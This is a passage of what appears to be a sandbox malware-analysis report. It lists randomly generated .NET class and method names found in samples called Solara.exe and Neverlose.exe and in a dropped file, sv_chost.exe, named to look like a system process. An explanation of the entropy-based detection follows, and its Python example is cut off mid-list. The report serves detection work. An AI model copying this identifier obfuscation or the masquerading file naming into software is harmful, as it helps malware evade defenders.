'QaWNagj6M4ABQakOS6OTPHDPDHY4cmTHkTTUsuzR00UI8ZN7q6d6UOgSbaBPordllN3DEMmSOtXXTnWOpE1ixPril51cpmyfGe', 'Y7slcQu3AJ0VF6BzAsMpAMAhDbYkKbt2eSIANY2JBkcGEMtNFPmmlTfBetZ0E919JifefOp9Rq06xhPqH225keFAlsVMrfDijg'
                  Source: Solara.exe.0.dr, E8phRKCKw5AfpQsOlZWL2sYGK.csHigh entropy of concatenated method names: 'woNNvbBHYYayGYkYBOl894t8i', '_3s5PwmBfKfiBCNOBQXr0grICf4uPFzQHgqdzkNyJBjrIBUyGowcEc52SRFc2zzv4zcjKlakgQDICleDyrlrOhYZs0Jdi4', 'LSyWMQAAazaffZiZKajqA1c9rwn5yD9bDrDB8PR1H2yF5HG4F19i1ZNieIEf90ddo6SEUBQAwvknoODglzpPnX6Z9SSES', 'F3aZ3ypQuDq48GzTIxVHe8vxnCLJ8vBqTPQDQygY1wjSeZlTLh3Oh9qS6YwnliV08FqlfIXvcpqXSrV1npLppBO7g4X2x', '_0WmFIssJVQqfaVIKIPw5SIJKWfhVdrSCNmeCyu7PcrBNHimyjP0ENQZyqeXcn7tgmq2RD0QZOmYwdmyCYH7eKMOV5ILUg'
                  Source: Solara.exe.0.dr, 0RhgANw5PGWmGKZ15e5NJiNQS.csHigh entropy of concatenated method names: 'rYVj5gN0TIrof0Ma56WAroWQX', '_3pY46X5nz8CyVBKd1fbfZimFh', 'B2sZNRjBHELj1BmXrJVBlwNh7', 'qJ5EUBuUhc6rQE3MB3cSPjITV', '_8YmVh1FhqE6WBC39aVR1v8sUmJmjJ3oR5kLT3uoZFvTCxKVOX3S4L6rw8iGqkMrheFxdYCWh8SC4Ri8qgV2NlkrWTWHmY', 'WJ9Ilb8WZtm4dcpxmii76VNMgm0VSFxEfym5TAyNrulmyZGN6UHNN5tdhhVJPj0KY53lSQBTzlJEQgCrAeXxXR0sD8tvI', 'bPY3VKC7hCUncfFuSChDTAo6zUo7JtfRfk5JUmQEJYxLSHU0HdS3MDBy6oOXGdIb6mLW47lYGYBlutT24KGw3pgrTe5V8', 'bUzlZdvTPOO0W5unfSl8GVKgBoAl9e6vBv0j57lKM4Hy84L9Am5u1ovnbJrhzZJHffqeikF1JOD00uCYZUr0CRKRrT3Hs', 'syRWe5KmsTdoPh058MzXXhs8Q2bSKwiAjaibQmmTaqM4CvqiOx2ZSJwmU55NyeFrXBprlOwsmsErXlfabM43VtzPOcogG', 'E7PHFRwMBYzt2AJjaqXkACO1EaoJ5H15wT25EfsEZawy84TyYDjrvHPvR3Uj6DKCcFwA4fEp1g0K4hpznNlKtUGIqOegp'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, WUHrLuAzG76gjb420QL2petRr.csHigh entropy of concatenated method names: 'OowvofSDDc4ET7y3kHStsFVYQ', 'wUT7yhbH8yrBs28ptpZ7paLIi', 'cPuCSHrIUyinXAQpEZE4qi2uf', 'wK6BrlTVvp0PIWOzWT7N6I5TtuMEcl8kh1S', 'XWB6EcNQHnQNbT6OCzzqiip7Z8eX9YYcxFD', 'f6SWfPTavhpioocdQbXsEVHxfgQYt0NEdjz', 'IQI51zSt6w3RX352czL0GqqRyiaZ9beRTLi', '_3FSsJ68XU4xFa7TqCN2LmOvwIIiRusfNaOS', 'QqejOadNHaBM70sYr2ndJwSFJGC1Z7a4dQT', 'oqq09uWShpD1v0on0o646ceHuX2dnyKbdUZ'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.csHigh entropy of concatenated method names: 'LBGv7RRFPn4976IF9aRFE4vMEUNxsaQ0bX1DWEDJaOUZKCUQuWk1RO2ylGq3', 'udpRpvGmAz57Y2O8rM75yPIs91RxBCk8Xb9GN7Bckx9ELsEaHfKb3FLeNqp7', 'xMaI0a85HjyijYhMhP0ctM9y6tQCq4UIJ6di5ajAt5xvLPbPAQwvBotBhSop', 'xOJfSVuUewM3wv7I67tAmY6qiJFhyVFqymavk4CN7cADRf5ACje5q4FkW0pM'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, YkmDGDOksHr5qrnsfF4B2F4yTHPN8Jh3v2Y5xPFK1ucmal0ibb0PwQ2xw1gyde4c6.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'kEIRhyaOG6W7qjuLq4LO1JMrwQMvzpv7aBvNkd2N7gYLrFxgYV4vfwY0DOCeqwXfuqAuMzOeDGC', 'QENxfIInhQRjLWxrm4RQ6lFWuMNo006mvnz2mewQA1IgthDBYwBqq9YW2tSMJ8L7haMhmVC0L5h', 'Q8M1YYpFKjomgnimRPqiovTyJncNoDj8xmyzwwel1aPdHCj98KvrRLayALB0', '_7r3jC0HfqMCJNMMkhzZTNQVzUYF77xCqgzGXb6oSvai9OMItNLBCLe5pW7kN'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, rKw0lbvJvj9v9nQmNRYVdkaAc.csHigh entropy of concatenated method names: '_3WkO9CHX5n3O0pGvwGK2GYYE1', 'MhM84cAcUC1tmKCDH3sJ7JSLJ', 'fJQ171sCTcNYAMsRUZImHvsJb', 'UlSZPzIGapH4OdhfOJKxnUCM0', 'C3ZtU5gOVvNrDnOJ4QThnfs74', 'Z7l08qNJCG6GApOyUfYdmhVki', '_0992M3o93AjFJXrFDl7bMy5rd', 'P0o9Na9XjNXWqALcTFWJeAG1V', 'fY5sVZgSamt9kyYZnDwtu45CZ', 'VvWC8Ut8u54FUjU7sAphOV0QN'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, Wj3PjIfqD1OSSp0iwZycbM1aD.csHigh entropy of concatenated method names: 'RXrXjEiYvFSIlBcduEeeE8lH9', 'PAxhwEy1krySFSbJSOQcG3gSJ', 'h98aL2t7wod8gzaBng9cdkgtH', '_9U2gA8lwegLGMUrP7KqCkKV8c', 'm4R9ZM4JZ4viyR28mfUhQU3fP', 'A8TvHfc9O4NDr5h6uXJJKzIcY', 'nHGP2MMab7ieetFHPOCzaS0lh', 'JdBvwjbLekFt843r0HegBknfw', 'mbqZYrm30q4fPFbOLgm25u4QJ', 'Q5OEHHUrArBRxsi9WguVtcyVW'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs: High entropy of concatenated method names: 'GxO3TdFlvoojPQarF5sHZUWQYcUQdoqTpgV2TADkl0NcyK2z7GmcJ1EGd2nRNhSmmoadBkC9YhNvhAemX9Ndm5U88NtOFEwITP', '_8wGo8NDHX8IchWy5emXSDv58GsBJnMRJrxlvCNrMLX48UbwnmVQfxREEfpw4G2Tuu4auegCyaaryctNC0Q0nLeRkTUs3XboLtu', 'gSvqT2UygyJ8SEjhMz7WS7m4GviFjA1XZYwOVOHhvBzrbxP7uVxVztEo7dBbVRiXjBb14k7OcyjNH3V1GWNZoyFALczGvFNfWh', 'lygg1I8X9Vr3DNzZlHUWuu4Y6PRhc9lVV7knYyo2zmgOU4xvgj9MJceVz6xWblv3I4g5EbMYpmEsQofqmkXunWyryhatai6Fdv', 'YCoF4EvPrPjHQZ0HflYeaTjEsgqlACwC0h38tj5QaCfIhEklMWUvJq0IS5nOUnscQc0fKGXHPoc8h1DBGRTiTECaza65ubAEDJ', 'wRC9iO4UNSzzIHVnbM5hHNX6arORUdzwaxfB0tvq68IBKllpxL0xh5L0bnmMmbjrgXbl8gDAJwtE5GbFyFqbN0FPO375CsO4EM', 'qG32MDQ12K0GRA77JkqYtxX7Wf6hJdixIDbhktqaarUafj0WT04RKQX5XPRiRXtWFcktaSI0QJGQ322mYhJkaLC1eMgyMk5jHM', 'dPRlkea35Qb0tgllFMwACj1BznSFtzDtR56UqoK9JDthAljsFZnwkO79aDMsHR69xEGY6XKNJgXE08sC7SoWgn2zgNzVgwRTh9', 'Vbpv1QaisRwG8kMSJBQbtGSKL9CgA2BqkRlIts0WrpIHBAqa0w9zke4GGpMuPwYlS3JcO39JftJABy29gXidcex6SlO5ShynID', 'natV2pBRfwSVKnZRVRxJPMfLHM539iW0KWweYNUAmjvkmFDnnT6vX7QqdIM6rVTaHDMpeksTKcfDkfBUvxPqozyxdZIATHo0es'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, P2XOur6bqoe5LxNtDHyiL3aGh.cs: High entropy of concatenated method names: 'aJJJWPOIkTbTkss4Igvj4IkdB', 'R3CY8bj7ZA7ssA0a57qXXqY2zaw4WTCya0YoxYCbdT61szRxWvcYxbbIwW94', 'bqodObM0EtWvsA8UOldQGkJQG81RBNBuXPmGbHCcrEiiNGgTwugTyAVpgTlu', 'mMZZ9OHwXusb2dKkVAQ1jgP0av6JAL2tHls9WWek56WkeUmnDGvug2kQ0uTY', 'L93aRCzIAJy7U8XuS69Rgkgz9zS99KEIiCwZxFUvfymVhwdXkjpwYPeRs0cZ'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, 9anJqYyVCjcrXTuH1GzopYW8wzyY78Cd40FBQZs2D00E8Ibmuz0NNIGaS8nPFW6rEQFzkcsRuNbLEld04TJOzbVcsq03WRbNSG.cs: High entropy of concatenated method names: 'vhyLcb9WwRxTlJ28NuxeWPj0eoKj5cZufOpv2fBjWc44RyALE2I2OQdqaJYlhndX0LbEnkiruOJ2bQvqLyr3ruQEqUvD0c6m7C', 't02xA0JZht1N9iOyAPNGa0fXGh1ru1pr2VC7SlnQtH3f9wDeVo3meILYSyQBPUe3iI4owHK3dhSfPqdqN37iNWZMJ72HGsWfXv', 'c0LqPsDD9vpIvPboJ2p5Vh8iro038VLiShiPHknWmWUdf281xfhpF5O0R1rdB1a3WUgZlStGKEdW9y1dm7erjqRg6Vdm1uXAOO', 'JUqhuH2arwD8n31kiAbg25H76i8zc3Hvg2zJKbIzkdGWcLQJDPsvan1fbFnNj62ZfHJHWKwJB1UJ8nuH6o6aSkuIFkhi3rfLVb', '_45Z3UpAryp7dJR4jHvUasCrIXOby7BdcytU33dsicQQGZkPrxbPW5hxjl4CeJfPOKh9fd8YU5zwfIRsrQEdE0zFUz5ETKJB8BW', 'uGYoX3KpGSaukuhq6MExbq3sp3emPKwCGpsHl8eT1Rjnn3jfdDFnx7fVXR7w', 'v6aaD0eafsx1Lm9zTRXenuXlPSOHP0BbmYHbUtxy1n8cs92X0VMVZ1CGgbft', 'BBMDmVpkEAPx6KlniT6v1pY597rRrIgbFPQ5DabpusmxSfzNuDhrCru5hViv', 'ozDyrJ7c8KthqWAA2IjogXVpWuVYBITckeTOIGZ25Je38Wvi28wQsSR04zZz', 'YsSKpaSercYU0RD2KNsU9fN7DsqpnqImXkxiT6K21QVFBaNcCft5zM5qKTta'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, vQAPrP9GTLqDP2TnxJeVqWDPZUl80OjDPKWiB9VD1kMfb5r21UVMVWfhd592gHEG8uqxz64WQlAbmJteBo6yNqI0GEgj98oDxc.cs: High entropy of concatenated method names: 'PAzJ2Vuz2610vI1WuG7NojUv2f66IGmfr3y7CIyzNVWTOmPLeJ0i1ZVt373gl2wjwTxjgFJRBRazzKwe7lJXrgu2hVeXBxtHhg', 'hIVubgYXHBzKvBDW0ilVwVIt1Vvs0H2aeGoqzLiMzjW5neC3LgPbhLVA76XswcKn7mJLmiAEXvIokptm0Ek9Ufiq9WzUtxGFaU', 'hAe4tkQP421eNr7Zc4MeougE41ZHAsl1ljhPHDgAIocDCXl7fF6GE3vOH12dOwlsJ9qhNeACsGU8qgAjfZjpfFeTltZmprhlHk', 'Bf8uaoyAmqUuabzA1M9c19yH1J2QckpWPPZ3MrTre2cHTMS1q73va5tmvsBLDZfzOmDYx8xxcndB3tbuzRtKUmVUiD1F1gQI7C', 'VwkVlWGISswZyeOkrSiHbu9jO17cxX9l3shzwvLRAHAzrqhKrB3Y8smKrcGyS4OeR0jHaUGOIwVp8GGlMWTxvqPckiEPj4MTDJ', '_7EG628END1shnUJVHgqToJjFeefrJgkPKk3lcLTZ8viUSYF8f5eFRwC70J8i9C50by3SmQonZLbNaWDPu21o8eVV829cgeoZvh', 'DAPRzYyW2xpLAKpXBLhoVztCUq7U0k4YkvkQzm5jumXywN8ckqgVsNoH8eN98JHCQNcIE67Bprcd0v3lhyd1B4hypI8gZ40nPg', 'GtofFdJ4qCtavXAGBjCunL2YwMO3rMk8OpyqgJJO8BRwD9hLP5nkWO3TkBcpSSp0oKRH4HAY5wJF04QOylCX26oqBm9Z9qfAuQ', 'QaWNagj6M4ABQakOS6OTPHDPDHY4cmTHkTTUsuzR00UI8ZN7q6d6UOgSbaBPordllN3DEMmSOtXXTnWOpE1ixPril51cpmyfGe', 'Y7slcQu3AJ0VF6BzAsMpAMAhDbYkKbt2eSIANY2JBkcGEMtNFPmmlTfBetZ0E919JifefOp9Rq06xhPqH225keFAlsVMrfDijg'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, E8phRKCKw5AfpQsOlZWL2sYGK.cs: High entropy of concatenated method names: 'woNNvbBHYYayGYkYBOl894t8i', '_3s5PwmBfKfiBCNOBQXr0grICf4uPFzQHgqdzkNyJBjrIBUyGowcEc52SRFc2zzv4zcjKlakgQDICleDyrlrOhYZs0Jdi4', 'LSyWMQAAazaffZiZKajqA1c9rwn5yD9bDrDB8PR1H2yF5HG4F19i1ZNieIEf90ddo6SEUBQAwvknoODglzpPnX6Z9SSES', 'F3aZ3ypQuDq48GzTIxVHe8vxnCLJ8vBqTPQDQygY1wjSeZlTLh3Oh9qS6YwnliV08FqlfIXvcpqXSrV1npLppBO7g4X2x', '_0WmFIssJVQqfaVIKIPw5SIJKWfhVdrSCNmeCyu7PcrBNHimyjP0ENQZyqeXcn7tgmq2RD0QZOmYwdmyCYH7eKMOV5ILUg'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, 0RhgANw5PGWmGKZ15e5NJiNQS.cs: High entropy of concatenated method names: 'rYVj5gN0TIrof0Ma56WAroWQX', '_3pY46X5nz8CyVBKd1fbfZimFh', 'B2sZNRjBHELj1BmXrJVBlwNh7', 'qJ5EUBuUhc6rQE3MB3cSPjITV', '_8YmVh1FhqE6WBC39aVR1v8sUmJmjJ3oR5kLT3uoZFvTCxKVOX3S4L6rw8iGqkMrheFxdYCWh8SC4Ri8qgV2NlkrWTWHmY', 'WJ9Ilb8WZtm4dcpxmii76VNMgm0VSFxEfym5TAyNrulmyZGN6UHNN5tdhhVJPj0KY53lSQBTzlJEQgCrAeXxXR0sD8tvI', 'bPY3VKC7hCUncfFuSChDTAo6zUo7JtfRfk5JUmQEJYxLSHU0HdS3MDBy6oOXGdIb6mLW47lYGYBlutT24KGw3pgrTe5V8', 'bUzlZdvTPOO0W5unfSl8GVKgBoAl9e6vBv0j57lKM4Hy84L9Am5u1ovnbJrhzZJHffqeikF1JOD00uCYZUr0CRKRrT3Hs', 'syRWe5KmsTdoPh058MzXXhs8Q2bSKwiAjaibQmmTaqM4CvqiOx2ZSJwmU55NyeFrXBprlOwsmsErXlfabM43VtzPOcogG', 'E7PHFRwMBYzt2AJjaqXkACO1EaoJ5H15wT25EfsEZawy84TyYDjrvHPvR3Uj6DKCcFwA4fEp1g0K4hpznNlKtUGIqOegp'
                  Source: sv_chost.exe.4.dr, WUHrLuAzG76gjb420QL2petRr.cs: High entropy of concatenated method names: 'OowvofSDDc4ET7y3kHStsFVYQ', 'wUT7yhbH8yrBs28ptpZ7paLIi', 'cPuCSHrIUyinXAQpEZE4qi2uf', 'wK6BrlTVvp0PIWOzWT7N6I5TtuMEcl8kh1S', 'XWB6EcNQHnQNbT6OCzzqiip7Z8eX9YYcxFD', 'f6SWfPTavhpioocdQbXsEVHxfgQYt0NEdjz', 'IQI51zSt6w3RX352czL0GqqRyiaZ9beRTLi', '_3FSsJ68XU4xFa7TqCN2LmOvwIIiRusfNaOS', 'QqejOadNHaBM70sYr2ndJwSFJGC1Z7a4dQT', 'oqq09uWShpD1v0on0o646ceHuX2dnyKbdUZ'
                  Source: sv_chost.exe.4.dr, FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.cs: High entropy of concatenated method names: 'LBGv7RRFPn4976IF9aRFE4vMEUNxsaQ0bX1DWEDJaOUZKCUQuWk1RO2ylGq3', 'udpRpvGmAz57Y2O8rM75yPIs91RxBCk8Xb9GN7Bckx9ELsEaHfKb3FLeNqp7', 'xMaI0a85HjyijYhMhP0ctM9y6tQCq4UIJ6di5ajAt5xvLPbPAQwvBotBhSop', 'xOJfSVuUewM3wv7I67tAmY6qiJFhyVFqymavk4CN7cADRf5ACje5q4FkW0pM'
                  Source: sv_chost.exe.4.dr, YkmDGDOksHr5qrnsfF4B2F4yTHPN8Jh3v2Y5xPFK1ucmal0ibb0PwQ2xw1gyde4c6.cs: High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'kEIRhyaOG6W7qjuLq4LO1JMrwQMvzpv7aBvNkd2N7gYLrFxgYV4vfwY0DOCeqwXfuqAuMzOeDGC', 'QENxfIInhQRjLWxrm4RQ6lFWuMNo006mvnz2mewQA1IgthDBYwBqq9YW2tSMJ8L7haMhmVC0L5h', 'Q8M1YYpFKjomgnimRPqiovTyJncNoDj8xmyzwwel1aPdHCj98KvrRLayALB0', '_7r3jC0HfqMCJNMMkhzZTNQVzUYF77xCqgzGXb6oSvai9OMItNLBCLe5pW7kN'
                  Source: sv_chost.exe.4.dr, rKw0lbvJvj9v9nQmNRYVdkaAc.cs: High entropy of concatenated method names: '_3WkO9CHX5n3O0pGvwGK2GYYE1', 'MhM84cAcUC1tmKCDH3sJ7JSLJ', 'fJQ171sCTcNYAMsRUZImHvsJb', 'UlSZPzIGapH4OdhfOJKxnUCM0', 'C3ZtU5gOVvNrDnOJ4QThnfs74', 'Z7l08qNJCG6GApOyUfYdmhVki', '_0992M3o93AjFJXrFDl7bMy5rd', 'P0o9Na9XjNXWqALcTFWJeAG1V', 'fY5sVZgSamt9kyYZnDwtu45CZ', 'VvWC8Ut8u54FUjU7sAphOV0QN'
                  Source: sv_chost.exe.4.dr, Wj3PjIfqD1OSSp0iwZycbM1aD.cs: High entropy of concatenated method names: 'RXrXjEiYvFSIlBcduEeeE8lH9', 'PAxhwEy1krySFSbJSOQcG3gSJ', 'h98aL2t7wod8gzaBng9cdkgtH', '_9U2gA8lwegLGMUrP7KqCkKV8c', 'm4R9ZM4JZ4viyR28mfUhQU3fP', 'A8TvHfc9O4NDr5h6uXJJKzIcY', 'nHGP2MMab7ieetFHPOCzaS0lh', 'JdBvwjbLekFt843r0HegBknfw', 'mbqZYrm30q4fPFbOLgm25u4QJ', 'Q5OEHHUrArBRxsi9WguVtcyVW'
                  Source: sv_chost.exe.4.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs: High entropy of concatenated method names: 'GxO3TdFlvoojPQarF5sHZUWQYcUQdoqTpgV2TADkl0NcyK2z7GmcJ1EGd2nRNhSmmoadBkC9YhNvhAemX9Ndm5U88NtOFEwITP', '_8wGo8NDHX8IchWy5emXSDv58GsBJnMRJrxlvCNrMLX48UbwnmVQfxREEfpw4G2Tuu4auegCyaaryctNC0Q0nLeRkTUs3XboLtu', 'gSvqT2UygyJ8SEjhMz7WS7m4GviFjA1XZYwOVOHhvBzrbxP7uVxVztEo7dBbVRiXjBb14k7OcyjNH3V1GWNZoyFALczGvFNfWh', 'lygg1I8X9Vr3DNzZlHUWuu4Y6PRhc9lVV7knYyo2zmgOU4xvgj9MJceVz6xWblv3I4g5EbMYpmEsQofqmkXunWyryhatai6Fdv', 'YCoF4EvPrPjHQZ0HflYeaTjEsgqlACwC0h38tj5QaCfIhEklMWUvJq0IS5nOUnscQc0fKGXHPoc8h1DBGRTiTECaza65ubAEDJ', 'wRC9iO4UNSzzIHVnbM5hHNX6arORUdzwaxfB0tvq68IBKllpxL0xh5L0bnmMmbjrgXbl8gDAJwtE5GbFyFqbN0FPO375CsO4EM', 'qG32MDQ12K0GRA77JkqYtxX7Wf6hJdixIDbhktqaarUafj0WT04RKQX5XPRiRXtWFcktaSI0QJGQ322mYhJkaLC1eMgyMk5jHM', 'dPRlkea35Qb0tgllFMwACj1BznSFtzDtR56UqoK9JDthAljsFZnwkO79aDMsHR69xEGY6XKNJgXE08sC7SoWgn2zgNzVgwRTh9', 'Vbpv1QaisRwG8kMSJBQbtGSKL9CgA2BqkRlIts0WrpIHBAqa0w9zke4GGpMuPwYlS3JcO39JftJABy29gXidcex6SlO5ShynID', 'natV2pBRfwSVKnZRVRxJPMfLHM539iW0KWweYNUAmjvkmFDnnT6vX7QqdIM6rVTaHDMpeksTKcfDkfBUvxPqozyxdZIATHo0es'
                  Source: sv_chost.exe.4.dr, P2XOur6bqoe5LxNtDHyiL3aGh.cs: High entropy of concatenated method names: 'aJJJWPOIkTbTkss4Igvj4IkdB', 'R3CY8bj7ZA7ssA0a57qXXqY2zaw4WTCya0YoxYCbdT61szRxWvcYxbbIwW94', 'bqodObM0EtWvsA8UOldQGkJQG81RBNBuXPmGbHCcrEiiNGgTwugTyAVpgTlu', 'mMZZ9OHwXusb2dKkVAQ1jgP0av6JAL2tHls9WWek56WkeUmnDGvug2kQ0uTY', 'L93aRCzIAJy7U8XuS69Rgkgz9zS99KEIiCwZxFUvfymVhwdXkjpwYPeRs0cZ'
                  Source: sv_chost.exe.4.dr, 9anJqYyVCjcrXTuH1GzopYW8wzyY78Cd40FBQZs2D00E8Ibmuz0NNIGaS8nPFW6rEQFzkcsRuNbLEld04TJOzbVcsq03WRbNSG.cs: High entropy of concatenated method names: 'vhyLcb9WwRxTlJ28NuxeWPj0eoKj5cZufOpv2fBjWc44RyALE2I2OQdqaJYlhndX0LbEnkiruOJ2bQvqLyr3ruQEqUvD0c6m7C', 't02xA0JZht1N9iOyAPNGa0fXGh1ru1pr2VC7SlnQtH3f9wDeVo3meILYSyQBPUe3iI4owHK3dhSfPqdqN37iNWZMJ72HGsWfXv', 'c0LqPsDD9vpIvPboJ2p5Vh8iro038VLiShiPHknWmWUdf281xfhpF5O0R1rdB1a3WUgZlStGKEdW9y1dm7erjqRg6Vdm1uXAOO', 'JUqhuH2arwD8n31kiAbg25H76i8zc3Hvg2zJKbIzkdGWcLQJDPsvan1fbFnNj62ZfHJHWKwJB1UJ8nuH6o6aSkuIFkhi3rfLVb', '_45Z3UpAryp7dJR4jHvUasCrIXOby7BdcytU33dsicQQGZkPrxbPW5hxjl4CeJfPOKh9fd8YU5zwfIRsrQEdE0zFUz5ETKJB8BW', 'uGYoX3KpGSaukuhq6MExbq3sp3emPKwCGpsHl8eT1Rjnn3jfdDFnx7fVXR7w', 'v6aaD0eafsx1Lm9zTRXenuXlPSOHP0BbmYHbUtxy1n8cs92X0VMVZ1CGgbft', 'BBMDmVpkEAPx6KlniT6v1pY597rRrIgbFPQ5DabpusmxSfzNuDhrCru5hViv', 'ozDyrJ7c8KthqWAA2IjogXVpWuVYBITckeTOIGZ25Je38Wvi28wQsSR04zZz', 'YsSKpaSercYU0RD2KNsU9fN7DsqpnqImXkxiT6K21QVFBaNcCft5zM5qKTta'
                  Source: sv_chost.exe.4.dr, vQAPrP9GTLqDP2TnxJeVqWDPZUl80OjDPKWiB9VD1kMfb5r21UVMVWfhd592gHEG8uqxz64WQlAbmJteBo6yNqI0GEgj98oDxc.cs: High entropy of concatenated method names: 'PAzJ2Vuz2610vI1WuG7NojUv2f66IGmfr3y7CIyzNVWTOmPLeJ0i1ZVt373gl2wjwTxjgFJRBRazzKwe7lJXrgu2hVeXBxtHhg', 'hIVubgYXHBzKvBDW0ilVwVIt1Vvs0H2aeGoqzLiMzjW5neC3LgPbhLVA76XswcKn7mJLmiAEXvIokptm0Ek9Ufiq9WzUtxGFaU', 'hAe4tkQP421eNr7Zc4MeougE41ZHAsl1ljhPHDgAIocDCXl7fF6GE3vOH12dOwlsJ9qhNeACsGU8qgAjfZjpfFeTltZmprhlHk', 'Bf8uaoyAmqUuabzA1M9c19yH1J2QckpWPPZ3MrTre2cHTMS1q73va5tmvsBLDZfzOmDYx8xxcndB3tbuzRtKUmVUiD1F1gQI7C', 'VwkVlWGISswZyeOkrSiHbu9jO17cxX9l3shzwvLRAHAzrqhKrB3Y8smKrcGyS4OeR0jHaUGOIwVp8GGlMWTxvqPckiEPj4MTDJ', '_7EG628END1shnUJVHgqToJjFeefrJgkPKk3lcLTZ8viUSYF8f5eFRwC70J8i9C50by3SmQonZLbNaWDPu21o8eVV829cgeoZvh', 'DAPRzYyW2xpLAKpXBLhoVztCUq7U0k4YkvkQzm5jumXywN8ckqgVsNoH8eN98JHCQNcIE67Bprcd0v3lhyd1B4hypI8gZ40nPg', 'GtofFdJ4qCtavXAGBjCunL2YwMO3rMk8OpyqgJJO8BRwD9hLP5nkWO3TkBcpSSp0oKRH4HAY5wJF04QOylCX26oqBm9Z9qfAuQ', 'QaWNagj6M4ABQakOS6OTPHDPDHY4cmTHkTTUsuzR00UI8ZN7q6d6UOgSbaBPordllN3DEMmSOtXXTnWOpE1ixPril51cpmyfGe', 'Y7slcQu3AJ0VF6BzAsMpAMAhDbYkKbt2eSIANY2JBkcGEMtNFPmmlTfBetZ0E919JifefOp9Rq06xhPqH225keFAlsVMrfDijg'
                  Source: sv_chost.exe.4.dr, E8phRKCKw5AfpQsOlZWL2sYGK.cs: High entropy of concatenated method names: 'woNNvbBHYYayGYkYBOl894t8i', '_3s5PwmBfKfiBCNOBQXr0grICf4uPFzQHgqdzkNyJBjrIBUyGowcEc52SRFc2zzv4zcjKlakgQDICleDyrlrOhYZs0Jdi4', 'LSyWMQAAazaffZiZKajqA1c9rwn5yD9bDrDB8PR1H2yF5HG4F19i1ZNieIEf90ddo6SEUBQAwvknoODglzpPnX6Z9SSES', 'F3aZ3ypQuDq48GzTIxVHe8vxnCLJ8vBqTPQDQygY1wjSeZlTLh3Oh9qS6YwnliV08FqlfIXvcpqXSrV1npLppBO7g4X2x', '_0WmFIssJVQqfaVIKIPw5SIJKWfhVdrSCNmeCyu7PcrBNHimyjP0ENQZyqeXcn7tgmq2RD0QZOmYwdmyCYH7eKMOV5ILUg'
                  Source: sv_chost.exe.4.dr, 0RhgANw5PGWmGKZ15e5NJiNQS.cs: High entropy of concatenated method names: 'rYVj5gN0TIrof0Ma56WAroWQX', '_3pY46X5nz8CyVBKd1fbfZimFh', 'B2sZNRjBHELj1BmXrJVBlwNh7', 'qJ5EUBuUhc6rQE3MB3cSPjITV', '_8YmVh1FhqE6WBC39aVR1v8sUmJmjJ3oR5kLT3uoZFvTCxKVOX3S4L6rw8iGqkMrheFxdYCWh8SC4Ri8qgV2NlkrWTWHmY', 'WJ9Ilb8WZtm4dcpxmii76VNMgm0VSFxEfym5TAyNrulmyZGN6UHNN5tdhhVJPj0KY53lSQBTzlJEQgCrAeXxXR0sD8tvI', 'bPY3VKC7hCUncfFuSChDTAo6zUo7JtfRfk5JUmQEJYxLSHU0HdS3MDBy6oOXGdIb6mLW47lYGYBlutT24KGw3pgrTe5V8', 'bUzlZdvTPOO0W5unfSl8GVKgBoAl9e6vBv0j57lKM4Hy84L9Am5u1ovnbJrhzZJHffqeikF1JOD00uCYZUr0CRKRrT3Hs', 'syRWe5KmsTdoPh058MzXXhs8Q2bSKwiAjaibQmmTaqM4CvqiOx2ZSJwmU55NyeFrXBprlOwsmsErXlfabM43VtzPOcogG', 'E7PHFRwMBYzt2AJjaqXkACO1EaoJ5H15wT25EfsEZawy84TyYDjrvHPvR3Uj6DKCcFwA4fEp1g0K4hpznNlKtUGIqOegp'
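The six classes listed first for the unpacked Neverlose.exe memory region reappear with identical class and method names under sv_chost.exe.4.dr, so the dropped file carries the same obfuscated assembly that Neverlose.exe unpacks in memory. The heuristic behind these entries is simple: concatenate a class's method names and measure the Shannon entropy per character. Randomly generated base-62 identifiers approach log2(62), about 5.95 bits, while hand-written English-derived names stay well below 5. The Python below is an added example written for this page, not Joe Sandbox's detection code: the 5.0-bit threshold and the minimum sample size are assumptions, the OBFUSCATED and MIXED lists are copied from the entries above, and the BENIGN list is constructed. It also shows that the inherited Equals/GetHashCode/GetType/ToString names in the mixed sv_chost.exe class do not pull the score under the threshold.

```python
"""Added example: the 'high entropy of concatenated method names' heuristic applied
to method names quoted from the report above. Not the sandbox vendor's code."""
import math
import string
from collections import Counter

# Entropy of characters drawn uniformly from the 62 letters and digits that make up
# the generated names: log2(62), roughly 5.95 bits per character.
ALNUM_MAX_ENTROPY = math.log2(len(string.ascii_letters + string.digits))

ENTROPY_THRESHOLD = 5.0   # assumed cut-off for this example, not the vendor's value
MIN_CHARS = 64            # below this the per-character estimate is too noisy to trust

# Copied from the report: a fully obfuscated class (0RhgANw5PGWmGKZ15e5NJiNQS.cs).
OBFUSCATED = [
    'rYVj5gN0TIrof0Ma56WAroWQX', '_3pY46X5nz8CyVBKd1fbfZimFh',
    'B2sZNRjBHELj1BmXrJVBlwNh7', 'qJ5EUBuUhc6rQE3MB3cSPjITV',
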